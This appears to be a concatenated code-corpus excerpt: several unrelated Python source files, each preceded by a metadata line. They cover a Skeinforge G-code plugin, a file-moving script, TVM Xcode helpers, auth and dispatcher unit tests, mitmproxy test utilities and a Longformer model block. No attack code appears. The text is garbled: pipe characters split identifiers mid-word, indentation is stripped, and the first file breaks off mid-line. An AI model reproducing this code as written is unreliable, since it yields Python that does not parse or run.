AlexeyKruglov/Skeinforge-fabmetheus | skeinforge_application/skeinforge_plugins/craft_plugins/preface.py | Python | agpl-3.0 | 10,703 | 0.019434 | #! /usr/bin/env python
"""
This page is in the table of contents.
Preface converts the svg slices into gcode extrusion layers, optionally with home, positioning, turn off, and unit commands.
The preface manual page is at:
http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Preface
==Settings==
===Meta===
Default is empty.
The 'Meta' field is to add meta tags or a note to all your files. Whatever is in that field will be added in a meta tagged line to the output.
===Set Positioning to Absolute===
Default is on.
When selected, preface will add the G90 command to set positioning to absolute.
===Set Units to Millimeters===
Default is on.
When selected, preface will add the G21 command to set the units to millimeters.
===Start at Home===
Default is off.
When selected, the G28 go to home gcode will be added at the beginning of the file.
===Turn Extruder Off===
====Turn Extruder Off at Shut Down====
Default is on.
When selected, the M103 turn extruder off gcode will be added at the end of the file.
====Turn Extruder Off at Start Up====
Default is on.
When selected, the M103 turn extruder off gcode will be added at the beginning of the file.
==Examples==
The following examples preface the file Screw Holder Bottom.stl. The examples are run in a terminal in the folder which contains Screw Holder Bottom.stl and preface.py.
> python preface.py
This brings up the preface dialog.
> python preface.py Screw Holder Bottom.stl
The preface tool is parsing the file:
Screw Holder Bottom.stl
..
The preface tool has created the file:
.. Screw Holder Bottom_preface.gcode
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from datetime import date, datetime
from fabmetheus_utilities.fabmetheus_tools import fabmetheus_interpret
from fabmetheus_utilities.svg_reader import SVGReader
from fabmetheus_utilities import archive
from fabmetheus_utilities import euclidean
from fabmetheus_utilities import gcodec
from fabmetheus_utilities import intercircle
from fabmetheus_utilities import settings
from fabmetheus_utilities import svg_writer
from skeinforge_application.skeinforge_utilities import skeinforge_craft
from skeinforge_application.skeinforge_utilities import skeinforge_polyfile
from skeinforge_application.skeinforge_utilities import skeinforge_profile
from time import strftime
import os
import sys
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__date__ = '$Date: 2008/02/05 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def getCraftedText( fileName, text='', repository = None ):
"Preface and convert an svg file or text."
return getCraftedTextFromText(archive.getTextIfEmpty(fileName, text), repository)
def getCraftedTextFromText( text, repository = None ):
"Preface and convert an svg text."
if gcodec.isProcedureDoneOrFileIsEmpty( text, 'preface'):
return text
if repository == None:
repository = settings.getReadRepository(PrefaceRepository())
return PrefaceSkein().getCraftedGcode(repository, text)
def getNewRepository():
'Get new repository.'
return PrefaceRepository()
def writeOutput(fileName, shouldAnalyze=True):
"Preface the carving of a gcode file."
skeinforge_craft.writeChainTextWithNounMessage(fileName, 'preface', shouldAnalyze)
class PrefaceRepository:
"A class to handle the preface settings."
def __init__(self):
"Set the default settings, execute title & settings fileName."
skeinforge_profile.addListsToCraftTypeRepository('skeinforge_application.skeinforge_plugins.craft_plugins.preface.html', self )
self.fileNameInput = settings.FileNameInput().getFromFileName( fabmetheus_interpret.getGNUTranslatorGcodeFileTypeTuples(), 'Open File for Preface', self, '')
self.openWikiManualHelpPage = settings.HelpPage().getOpenFromAbsolute('http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Preface')
self.met | a = settings.StringSetting().getFromValue('Meta:', self, '')
self.setPositioningToAbsolute = settings.BooleanSetting().getFromValue('Set Positioning to Absolute', self, True )
self.setUnitsToMillimeters = settings.BooleanSetting().getFromValue('Set Units to Millimeters', self, True )
self.startAtHome = settings.BooleanSetting().getFromValue('Start at Home', self, False )
settings.LabelSe | parator().getFromRepository(self)
settings.LabelDisplay().getFromName('- Turn Extruder Off -', self )
self.turnExtruderOffAtShutDown = settings.BooleanSetting().getFromValue('Turn Extruder Off at Shut Down', self, True )
self.turnExtruderOffAtStartUp = settings.BooleanSetting().getFromValue('Turn Extruder Off at Start Up', self, True )
self.executeTitle = 'Preface'
def execute(self):
"Preface button has been clicked."
fileNames = skeinforge_polyfile.getFileOrDirectoryTypesUnmodifiedGcode(self.fileNameInput.value, fabmetheus_interpret.getImportPluginFileNames(), self.fileNameInput.wasCancelled)
for fileName in fileNames:
writeOutput(fileName)
class PrefaceSkein:
"A class to preface a skein of extrusions."
def __init__(self):
self.distanceFeedRate = gcodec.DistanceFeedRate()
self.extruderActive = False
self.lineIndex = 0
self.oldLocation = None
self.svgReader = SVGReader()
def addInitializationToOutput(self):
"Add initialization gcode to the output."
self.distanceFeedRate.addTagBracketedLine('format', 'skeinforge gcode')
absoluteFilePathUntilDot = archive.getUntilDot(archive.getCraftPluginsDirectoryPath('preface.py'))
dateTodayString = date.today().isoformat().replace('-', '.')[2 :]
if absoluteFilePathUntilDot == '/home/enrique/Desktop/backup/babbleold/script/reprap/fabmetheus/skeinforge_application/skeinforge_plugins/craft_plugins/preface': #is this script on Enrique's computer?
archive.writeFileText(archive.getVersionFileName(), dateTodayString)
versionText = archive.getFileText(archive.getVersionFileName())
self.distanceFeedRate.addTagBracketedLine('version', versionText)
dateTimeTuple = datetime.now().timetuple()
created = dateTodayString + '|%s:%s' % (dateTimeTuple[3], dateTimeTuple[4])
self.distanceFeedRate.addTagBracketedLine('created', created)
self.distanceFeedRate.addLine('(<extruderInitialization>)')
if self.repository.setPositioningToAbsolute.value:
self.distanceFeedRate.addLine('G90 ;set positioning to absolute') # Set positioning to absolute.
if self.repository.setUnitsToMillimeters.value:
self.distanceFeedRate.addLine('G21 ;set units to millimeters') # Set units to millimeters.
if self.repository.startAtHome.value:
self.distanceFeedRate.addLine('G28 ;start at home') # Start at home.
if self.repository.turnExtruderOffAtStartUp.value:
self.distanceFeedRate.addLine('M103') # Turn extruder off.
craftTypeName = skeinforge_profile.getCraftTypeName()
self.distanceFeedRate.addTagBracketedLine('craftTypeName', craftTypeName)
self.distanceFeedRate.addTagBracketedLine('decimalPlacesCarried', self.distanceFeedRate.decimalPlacesCarried)
layerHeight = float(self.svgReader.sliceDictionary['layerHeight'])
self.distanceFeedRate.addTagRoundedLine('layerThickness', layerHeight)
self.distanceFeedRate.addTagRoundedLine('layerHeight', layerHeight)
if self.repository.meta.value:
self.distanceFeedRate.addTagBracketedLine('meta', self.repository.meta.value)
edgeWidth = float(self.svgReader.sliceDictionary['edgeWidth'])
self.distanceFeedRate.addTagRoundedLine('edgeWidth', edgeWidth)
self.distanceFeedRate.addTagRoundedLine('perimeterWidth', edgeWidth)
self.distanceFeedRate.addTagBracketedLine('profileName', skeinforge_profile.getProfileName(craftTypeName))
self.distanceFeedRate.addLine('(<settings>)')
pluginFileNames = skeinforge_craft.getPluginFileNames()
for pluginFileName in pluginFileNames:
self.addToolSettingLines(pluginFileName)
self.distanceFeedRate.addLine('(</settings>)')
self.distanceFeedRate.addTagBracketedLine('timeStampPreface', strftime('%Y%m%d_%H%M%S'))
procedureNames = self.svgReader.sliceDictionary['procedureName'].replace(',', ' ').split()
for procedureName in procedu |
dcodix/mv-elsewhere | mv-elsewhere.py | Python | gpl-2.0 | 5,068 | 0.00513 | #! /usr/bin/env python
# Copyright (C) 2012 dcodix
# This file may be distributed and/or modified under the terms of
# the GNU General Public License version 2 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.GPL" in the source distribution for more information.
""" This script will take filenames from the stdin and copy/move them to a
directory destination preserving the directory tree and atributes.
Most of the functionality is taken from shutil module.
"""
import os
import sys
import stat
import errno
import getopt
import argparse
from shutil import *
import time
def copydirtree(src, dst, symlinks=False, ignore=None, copy_function=copy2,
ignore_dangling_symlinks=False):
"""This function is a modification of shutil copytree
which only copy the directories of a tree but not
the files or links.
"""
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
if os.path.isdir(srcname):
copydirtree(srcname, dstname, symlinks, ignore, copy_function)
else:
continue
try:
copystat(src, dst)
except OSError as why:
if WindowsError is not None and isinstance(why, WindowsError):
# Copying file access times may fail on Windows
pass
else:
errors.extend((src, dst, str(why)))
if errors:
raise Error(errors)
def printmessage(logstring):
print('['+str(time.time())+'] '+logstring)
def verbosemessage(logstring):
if verbose:
printmessage(logstring)
def debugmessage(logstring):
if debuging:
printmessage(logstring)
def main():
scriptname = 'mv-elsewhere.py'
dst = ''
filemove = False
override = False
readstdin = True
global verbose
global debuging
verbose = False
debuging = False
exclude = ''
excludelist = ''
#GET ARGS
parser = argparse.ArgumentParser(description='Move files')
parser.add_argument('-d', '--destdir', nargs=1, help='destination directory')
parser.add_argument('-D', '--debuging', help='debug', action="store_true")
parser.add_argument('-m', '--move', help='move instead of copy', action="store_true")
parser.add_argument('-o', '--override', help='override in destination', action="store_true")
parser.add_argument('-v', '--verbose', help='verbose', action="store_true")
parser.add_argument('-e', '--exclude', nargs='+', help='esclude list')
args = parser.parse_args()
if args.destdir:
dst = args.destdir[0]
if args.debuging:
verbose = True
debuging = True
if args.move:
filemove = True
if args.override:
override = True
if args.verbose:
verbose = True
if args.exclude:
excludelist = args.exclude
# PROCESS
nfiles = 0
while True:
excludefile = False
if readstdin: #This condition is meant to add the future posibilit | y to read files directly from a file instead of stdin.
file1 = sys.stdin.readline()
if not file1:
break
file1 = file1.rstrip()
debugmessage('file '+file1)
fpath = os.path.dirname(file1)
if len(fpath) == 0:
fpath = file1
if debuging:
print('fpath '+fpath)
if len(excludelist) != 0:
for exclude in excludelist:
if excl | ude in file1:
excludefile = True
debugmessage('file '+file1+' will be excluded')
dfile = dst + '/' + file1
dpath = dst + '/' + fpath
if not os.path.isdir(dpath):
verbosemessage('COPYNG TREE: from '+fpath+' to '+dpath)
copydirtree(fpath, dpath)
if not os.path.isdir(file1) and not excludefile:
if not os.path.exists(dfile) or override:
if filemove:
verbosemessage('MOVING: '+file1+' to '+dfile)
move(file1, dfile)
nfiles = nfiles + 1
else:
verbosemessage('COPYING: '+file1+' to '+dfile)
copy2(file1, dfile)
nfiles = nfiles + 1
else:
verbosemessage('NOT OVERRIDING: '+dfile)
pass
else:
if excludefile:
verbosemessage('EXCLUDED: '+file1)
pass
if nfiles == 0:
printmessage('No files have been moved or copied.')
else:
if filemove:
printmessage(str(nfiles)+' files have been moved.')
else:
printmessage(str(nfiles)+' files have been copied.')
if __name__ == "__main__":
main()
|
sxjscience/tvm | python/tvm/contrib/xcode.py | Python | apache-2.0 | 7,815 | 0.000896 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed t | o in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language gov | erning permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Utility to invoke Xcode compiler toolchain"""
from __future__ import absolute_import as _abs
import os
import sys
import subprocess
import json
from .._ffi.base import py_str
from . import util
def xcrun(cmd):
"""Run xcrun and return the output.
Parameters
----------
cmd : list of str
The command sequence.
Returns
-------
out : str
The output string.
"""
cmd = ["xcrun"] + cmd
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(out, _) = proc.communicate()
return out.strip()
def codesign(lib):
"""Codesign the shared libary
This is an required step for library to be loaded in
the app.
Parameters
----------
lib : The path to the library.
"""
if "TVM_IOS_CODESIGN" not in os.environ:
raise RuntimeError("Require environment variable TVM_IOS_CODESIGN " " to be the signature")
signature = os.environ["TVM_IOS_CODESIGN"]
cmd = ["codesign", "--force", "--sign", signature]
cmd += [lib]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Codesign error:\n"
msg += py_str(out)
raise RuntimeError(msg)
def create_dylib(output, objects, arch, sdk="macosx"):
"""Create dynamic library.
Parameters
----------
output : str
The target shared library.
objects : list
List of object files.
options : str
The additional options.
arch : str
Target major architectures
sdk : str
The sdk to be used.
"""
clang = xcrun(["-sdk", sdk, "-find", "clang"])
sdk_path = xcrun(["-sdk", sdk, "--show-sdk-path"])
cmd = [clang]
cmd += ["-dynamiclib"]
cmd += ["-arch", arch]
cmd += ["-isysroot", sdk_path]
cmd += ["-o", output]
if isinstance(objects, str):
cmd += [objects]
else:
cmd += objects
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Compilation error:\n"
msg += py_str(out)
raise RuntimeError(msg)
# assign so as default output format
create_dylib.output_format = "dylib"
def compile_metal(code, path_target=None, sdk="macosx"):
"""Compile metal with CLI tool from env.
Parameters
----------
code : str
The cuda code.
path_target : str, optional
Output file.
sdk : str, optional
The target platform SDK.
Return
------
metallib : bytearray
The bytearray of the metallib
"""
temp = util.tempdir()
temp_code = temp.relpath("my_lib.metal")
temp_ir = temp.relpath("my_lib.air")
temp_target = temp.relpath("my_lib.metallib")
with open(temp_code, "w") as out_file:
out_file.write(code)
file_target = path_target if path_target else temp_target
# See:
# - https://developer.apple.com/documentation/metal/gpu_functions_libraries/building_a_library_with_metal_s_command-line_tools#overview # pylint: disable=line-too-long
#
# xcrun -sdk macosx metal -c MyLibrary.metal -o MyLibrary.air
# xcrun -sdk macosx metallib MyLibrary.air -o MyLibrary.metallib
cmd1 = ["xcrun", "-sdk", sdk, "metal", "-O3"]
cmd1 += ["-c", temp_code, "-o", temp_ir]
cmd2 = ["xcrun", "-sdk", sdk, "metallib"]
cmd2 += [temp_ir, "-o", file_target]
proc = subprocess.Popen(
" ".join(cmd1) + ";" + " ".join(cmd2),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
(out, _) = proc.communicate()
if proc.returncode != 0:
sys.stderr.write("Compilation error:\n")
sys.stderr.write(py_str(out))
sys.stderr.flush()
libbin = None
else:
libbin = bytearray(open(file_target, "rb").read())
return libbin
def compile_coreml(model, model_name="main", out_dir="."):
"""Compile coreml model and return the compiled model path."""
mlmodel_path = os.path.join(out_dir, model_name + ".mlmodel")
mlmodelc_path = os.path.join(out_dir, model_name + ".mlmodelc")
metadata = {"inputs": list(model.input_description), "outputs": list(model.output_description)}
# Use the description field to send info to CoreML runtime
model.short_description = json.dumps(metadata)
model.save(mlmodel_path)
res = xcrun(["coremlcompiler", "compile", mlmodel_path, out_dir])
if not os.path.isdir(mlmodelc_path):
raise RuntimeError("Compile failed: %s" % res)
return mlmodelc_path
class XCodeRPCServer(object):
"""Wrapper for RPC server
Parameters
----------
cmd : list of str
The command to run
lock: FileLock
Lock on the path
"""
def __init__(self, cmd, lock):
self.proc = subprocess.Popen(cmd)
self.lock = lock
def join(self):
"""Wait server to finish and release its resource"""
self.proc.wait()
self.lock.release()
def popen_test_rpc(host, port, key, destination, libs=None, options=None):
"""Launch rpc server via xcodebuild test through another process.
Parameters
----------
host : str
The address of RPC proxy host.
port : int
The port of RPC proxy host
key : str
The key of the RPC server
destination : str
Destination device of deployment, as in xcodebuild
libs : list of str
List of files to be packed into app/Frameworks/tvm
These can be dylibs that can be loaed remoted by RPC.
options : list of str
Additional options to xcodebuild
Returns
-------
proc : Popen
The test rpc server process.
Don't do wait() on proc, since it can terminate normally.
"""
if "TVM_IOS_RPC_ROOT" in os.environ:
rpc_root = os.environ["TVM_IOS_RPC_ROOT"]
else:
curr_path = os.path.dirname(os.path.realpath(os.path.expanduser(__file__)))
rpc_root = os.path.join(curr_path, "../../../apps/ios_rpc")
proj_path = os.path.realpath(os.path.join(rpc_root, "tvmrpc.xcodeproj"))
if not os.path.exists(proj_path):
raise RuntimeError(
"Cannot find tvmrpc.xcodeproj in %s,"
+ (" please set env TVM_IOS_RPC_ROOT correctly" % rpc_root)
)
# Lock the path so only one file can run
lock = util.filelock(os.path.join(rpc_root, "ios_rpc.lock"))
with open(os.path.join(rpc_root, "rpc_config.txt"), "w") as fo:
fo.write("%s %d %s\n" % (host, port, key))
libs = libs if libs else []
for file_name in libs:
fo.write("%s\n" % file_name)
cmd = [
"xcrun",
"xcodebuild",
"-scheme",
"tvmrpc",
"-project",
proj_path,
"-destination",
destination,
]
if options:
cmd += options
cmd += ["test"]
return XCodeRPCServer(cmd, lock)
|
mkeilman/sirepo | tests/auth/guest1_test.py | Python | apache-2.0 | 1,794 | 0.000557 | # -*- coding: utf-8 -*-
u"""Test auth.guest
:copyright: Copyright (c) 2019 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest
def test_happy_path(auth_fc):
fc = auth_fc
from pykern import pkconfig, pkunit, pkio
from pykern.pkunit import pkok, pkre, pkeq
from pykern.pkdebug import pkdp
import re
fc.sr_get('authGuestLogin', {'simulation_type': fc.sr_sim_type})
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
fc.sr_auth_state(
avatarUrl=None,
displayName='Guest User',
guestIsOnlyMethod=False,
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=False,
method='guest',
needCompleteRegistration=False,
userName=None,
visibleMethods=['email'],
)
def test_timeout(auth_fc):
fc = auth_fc
from pykern import pkconfig, pkunit, pkio
from pykern import pkjson
from pykern.pkdebug import pkdp
from pykern.pkunit import pkok, pkre, pkeq, pkexcept
import re
r = f | c.sr_get('authGuestLogin', {'simulation_type': fc.sr_sim_type}, redirect=False)
pkeq(200, r.status_code)
d = pkjson.load_any(r.data)
pkeq(True, d.authState.isLogge | dIn)
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
fc.sr_auth_state(
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=False,
)
fc.sr_get_json('adjustTime', params={'days': '2'})
fc.sr_auth_state(
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=True,
)
with pkexcept('SRException.*guest-expired'):
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
|
tdickers/mitmproxy | netlib/tutils.py | Python | mit | 3,536 | 0.000848 | from io import BytesIO
import tempfile
import os
import time
import shutil
from contextlib import contextmanager
import six
import sys
from netlib import utils, tcp, http
def treader(bytes):
"""
Construct a tcp.Read object from bytes.
"""
fp = BytesIO(bytes)
return tcp.Reader(fp)
@contextmanager
def tmpdir(*args, **kwargs):
orig_workdir = os.getcwd()
temp_workdir = tempfile.mkdtemp(*args, **kwargs)
os.chdir(temp_workdir)
yield temp_workdir
os.chdir(orig_workdir)
shutil.rmtree(temp_workdir)
def _check_exception(expected, actual, exc_tb):
if isinstance(expected, six.string_types):
if expected.lower() not in str(actual).lower():
six.reraise(AssertionError, AssertionError(
"Expected %s, but caught %s" % (
repr(expected), repr(actual)
)
), exc_tb)
else:
if not isinstance(actual, expected):
| six.reraise(AssertionError, AssertionError(
"Expected %s, but caught %s %s" % (
| expected.__name__, actual.__class__.__name__, repr(actual)
)
), exc_tb)
def raises(expected_exception, obj=None, *args, **kwargs):
"""
Assert that a callable raises a specified exception.
:exc An exception class or a string. If a class, assert that an
exception of this type is raised. If a string, assert that the string
occurs in the string representation of the exception, based on a
case-insenstivie match.
:obj A callable object.
:args Arguments to be passsed to the callable.
:kwargs Arguments to be passed to the callable.
"""
if obj is None:
return RaisesContext(expected_exception)
else:
try:
ret = obj(*args, **kwargs)
except Exception as actual:
_check_exception(expected_exception, actual, sys.exc_info()[2])
else:
raise AssertionError("No exception raised. Return value: {}".format(ret))
class RaisesContext(object):
def __init__(self, expected_exception):
self.expected_exception = expected_exception
def __enter__(self):
return
def __exit__(self, exc_type, exc_val, exc_tb):
if not exc_type:
raise AssertionError("No exception raised.")
else:
_check_exception(self.expected_exception, exc_val, exc_tb)
return True
test_data = utils.Data(__name__)
# FIXME: Temporary workaround during repo merge.
test_data.dirname = os.path.join(test_data.dirname, "..", "test", "netlib")
def treq(**kwargs):
"""
Returns:
netlib.http.Request
"""
default = dict(
first_line_format="relative",
method=b"GET",
scheme=b"http",
host=b"address",
port=22,
path=b"/path",
http_version=b"HTTP/1.1",
headers=http.Headers(((b"header", b"qvalue"), (b"content-length", b"7"))),
content=b"content"
)
default.update(kwargs)
return http.Request(**default)
def tresp(**kwargs):
"""
Returns:
netlib.http.Response
"""
default = dict(
http_version=b"HTTP/1.1",
status_code=200,
reason=b"OK",
headers=http.Headers(((b"header-response", b"svalue"), (b"content-length", b"7"))),
content=b"message",
timestamp_start=time.time(),
timestamp_end=time.time(),
)
default.update(kwargs)
return http.Response(**default)
|
ChromiumWebApps/chromium | build/android/pylib/base/test_dispatcher_unittest.py | Python | bsd-3-clause | 7,737 | 0.007496 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for test_dispatcher.py."""
# pylint: disable=R0201
# pylint: disable=W0212
import os
import sys
import unittest
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)),
os.pardir, os.pardir))
# Mock out android_commands.GetAttachedDevices().
from pylib import android_commands
android_commands.GetAttachedDevices = lambda: ['0', '1']
from pylib import constants
from pylib.base import base_test_result
from pylib.base import test_dispatcher
from pylib.utils import watchdog_timer
class TestException(Exception):
pass
class MockRunner(object):
"""A mock TestRunner."""
def __init__(self, device='0', shard_index=0):
self.device = device
self.shard_index = shard_index
self.setups = 0
self.teardowns = 0
def RunTest(self, test):
results = base_test_result.TestRunResults()
results.AddResult(
base_test_result.BaseTestResult(test, base_test_result.ResultType.PASS))
return (results, None)
def SetUp(self):
self.setups += 1
def TearDown(self):
self.teardowns += 1
class MockRunnerFail(MockRunner):
def RunTest(self, test):
results = base_test_result.TestRunResults()
results.AddResult(
base_test_result.BaseTestResult(test, base_test_result.ResultType.FAIL))
return (results, test)
class MockRunnerFailTwice(MockRunner):
def __init__(self, device='0', shard_index=0):
super(MockRunnerFailTwice, self).__init__(device, shard_index)
self._fails = 0
def RunTest(self, test):
self._fails += 1
results = base_test_result.TestRunResults()
if self._fails <= 2:
results.AddResult(base_test_result.BaseTestResult(
test, base_test_result.ResultType.FAIL))
return (results, test)
else:
results.AddResult(base_test_result.BaseTestResult(
test, base_test_result.ResultType.PASS))
return (results, None)
class MockRunnerException(MockRunner):
def RunTest(self, test):
raise TestException
class TestFunctions(unittest.TestCase):
"""Tests test_dispatcher._RunTestsFromQueue."""
@staticmethod
def _RunTests(mock_runner, tests):
results = []
tests = test_dispatcher._TestCollection(
[test_dispatcher._Test(t) for t in tests])
test_dispatcher._RunTestsFromQueue(mock_runner, tests, results,
watchdog_timer.WatchdogTimer(None), 2)
run_results = base_test_result.TestRunResults()
for r in results:
run_results.AddTestRunResults(r)
return run_results
def testRunTestsFromQueue(self):
results = TestFunctions._RunTests(MockRunner(), ['a', 'b'])
self.assertEqual(len(results.GetPass()), 2)
self.assertEqual(len(results.GetNotPass()), 0)
def testRunTestsFromQueueRetry(self):
results = TestFunctions._RunTests(MockRunnerFail(), ['a', 'b'])
self.assertEqual(len(results.GetPass()), 0)
self.assertEqual(len(results.GetFail()), 2)
def testRunTestsFromQueueFailTwice(self):
results = TestFunctions._RunTests(MockRunnerFailTwice(), ['a', 'b'])
self.assertEqual(len(results.GetPass()), 2)
self.assertEqual(len(results.GetNotPass()), 0)
def testSetUp(self):
runners = []
counter = test_dispatcher._ThreadSafeCounter()
test_dispatcher._SetUp(MockRunner, '0', runners, counter)
self.assertEqual(len(runners), 1)
self.assertEqual(runners[0].setups, 1)
def testThreadSafeCounter(self):
counter = test_dispatcher._ThreadSafeCounter()
for i in xrange(5):
self.assertEqual(counter.GetAndIncrement(), i)
class TestThreadGroupFunctions(unittest.TestCase):
"""Tests test_dispatcher._RunAllTests and test_dispatcher._CreateRunners."""
def setUp(self):
self.tests = ['a', 'b', 'c', 'd', 'e', 'f', 'g']
shared_test_collection = test_dispatcher._TestCollection(
[test_dispatcher._Test(t) for t in self.tests])
self.test_collection_factory = lambda: shared_test_collection
def testCreate(self):
runners = test_dispatcher._CreateRunners(MockRunner, ['0', '1'])
for runner in runners:
self.assertEqual(runner.setups, 1)
self.assertEqual(set([r.device for r in runners]),
set(['0', '1']))
self.assertEqual(set([r.shard_index for r in runners]),
set([0, 1]))
def testRun(self):
runners = [MockRunner('0'), MockRunner('1')]
results, exit_code = test_dispatcher._RunAllTests(
runners, self.test_collection_factory, 0)
self.assertEqual(len(results.GetPass()), len(self.tests))
self.assertEqual(exit_code, 0)
def testTearDown(self):
runners = [MockRunner('0'), MockRunner('1')]
test_dispatcher._TearDownRunners(runners)
for runner in runners: |
self.assertEqual(runner.teardowns, 1)
| def testRetry(self):
runners = test_dispatcher._CreateRunners(MockRunnerFail, ['0', '1'])
results, exit_code = test_dispatcher._RunAllTests(
runners, self.test_collection_factory, 0)
self.assertEqual(len(results.GetFail()), len(self.tests))
self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)
def testReraise(self):
runners = test_dispatcher._CreateRunners(MockRunnerException, ['0', '1'])
with self.assertRaises(TestException):
test_dispatcher._RunAllTests(runners, self.test_collection_factory, 0)
class TestShard(unittest.TestCase):
"""Tests test_dispatcher.RunTests with sharding."""
@staticmethod
def _RunShard(runner_factory):
return test_dispatcher.RunTests(
['a', 'b', 'c'], runner_factory, ['0', '1'], shard=True)
def testShard(self):
results, exit_code = TestShard._RunShard(MockRunner)
self.assertEqual(len(results.GetPass()), 3)
self.assertEqual(exit_code, 0)
def testFailing(self):
results, exit_code = TestShard._RunShard(MockRunnerFail)
self.assertEqual(len(results.GetPass()), 0)
self.assertEqual(len(results.GetFail()), 3)
self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)
def testNoTests(self):
results, exit_code = test_dispatcher.RunTests(
[], MockRunner, ['0', '1'], shard=True)
self.assertEqual(len(results.GetAll()), 0)
self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)
def testTestsRemainWithAllDevicesOffline(self):
attached_devices = android_commands.GetAttachedDevices
android_commands.GetAttachedDevices = lambda: []
try:
with self.assertRaises(AssertionError):
_results, _exit_code = TestShard._RunShard(MockRunner)
finally:
android_commands.GetAttachedDevices = attached_devices
class TestReplicate(unittest.TestCase):
"""Tests test_dispatcher.RunTests with replication."""
@staticmethod
def _RunReplicate(runner_factory):
return test_dispatcher.RunTests(
['a', 'b', 'c'], runner_factory, ['0', '1'], shard=False)
def testReplicate(self):
results, exit_code = TestReplicate._RunReplicate(MockRunner)
# We expect 6 results since each test should have been run on every device
self.assertEqual(len(results.GetPass()), 6)
self.assertEqual(exit_code, 0)
def testFailing(self):
results, exit_code = TestReplicate._RunReplicate(MockRunnerFail)
self.assertEqual(len(results.GetPass()), 0)
self.assertEqual(len(results.GetFail()), 6)
self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)
def testNoTests(self):
results, exit_code = test_dispatcher.RunTests(
[], MockRunner, ['0', '1'], shard=False)
self.assertEqual(len(results.GetAll()), 0)
self.assertEqual(exit_code, constants.ERROR_EXIT_CODE)
if __name__ == '__main__':
unittest.main()
|
google-research/long-range-arena | lra_benchmarks/models/longformer/longformer.py | Python | apache-2.0 | 13,102 | 0.001679 | # Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Longformer modules."""
from flax import nn
import jax.numpy as jnp
from lra_benchmarks.models.layers import common_layers
from lra_benchmarks.models.longformer import longformer_attention
class LongformerBlock(nn.Module):
"""Longformer Layer."""
def apply(self,
inputs,
qkv_dim,
mlp_dim,
num_heads,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
dtype=jnp.float32,
inputs_segmentation=None,
padding_mask=None,
dropout_rate=0.1,
attention_dropout_rate=0.1,
deterministic=False):
"""Applies the LongformerBlock module.
Args:
inputs: input data of size `[bs, seq_len, features]`.
qkv_dim: dimension of the query/key/value.
mlp_dim: dimension of the mlp on top of attention block.
num_heads: number of attention heads.
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply causal attention mask.
dtype: the dtype of the computation (default: float32).
inputs_segmentation: input segmentation info for packed examples.
padding_mask: bool, mask padding tokens.
dropout_rate: dropout rate
attention_dropout_rate: dropout rate for attention weights
deterministic: if true, apply dropout else don't.
Returns:
output of shape `[bs, seq_len, mlp_dim]`.
"""
assert inputs.ndim == 3
x = nn.LayerNorm(inputs)
x = longformer_attention.LongformerSelfAttention(
x,
num_heads=num_heads,
qkv_features=qkv_dim,
sliding_window_size=sliding_window_size,
global_mask=global_mask,
causal_mask=causal_mask,
dtype=dtype,
segmentation=inputs_segmentation,
padding_mask=padding_mask,
kernel_init=nn.initializers.xavier_uniform(),
bias_init=nn.initializers.normal(stddev=1e-6),
bias=False,
broadcast_dropout=False,
dropout_rate=attention_dropout_rate,
deterministic=deterministic)
x = nn.dropout(x, rate=dropout_rate, deterministic=deterministic)
x = x + inputs
y = nn.LayerNorm(x)
y = common_layers.MlpBlock(
y,
mlp_dim=mlp_dim,
dtype=dtype,
dropout_rate=dropout_rate,
deterministic=deterministic)
return x + y
class LongformerEncoder(nn.Module):
"""Longformer Encoder."""
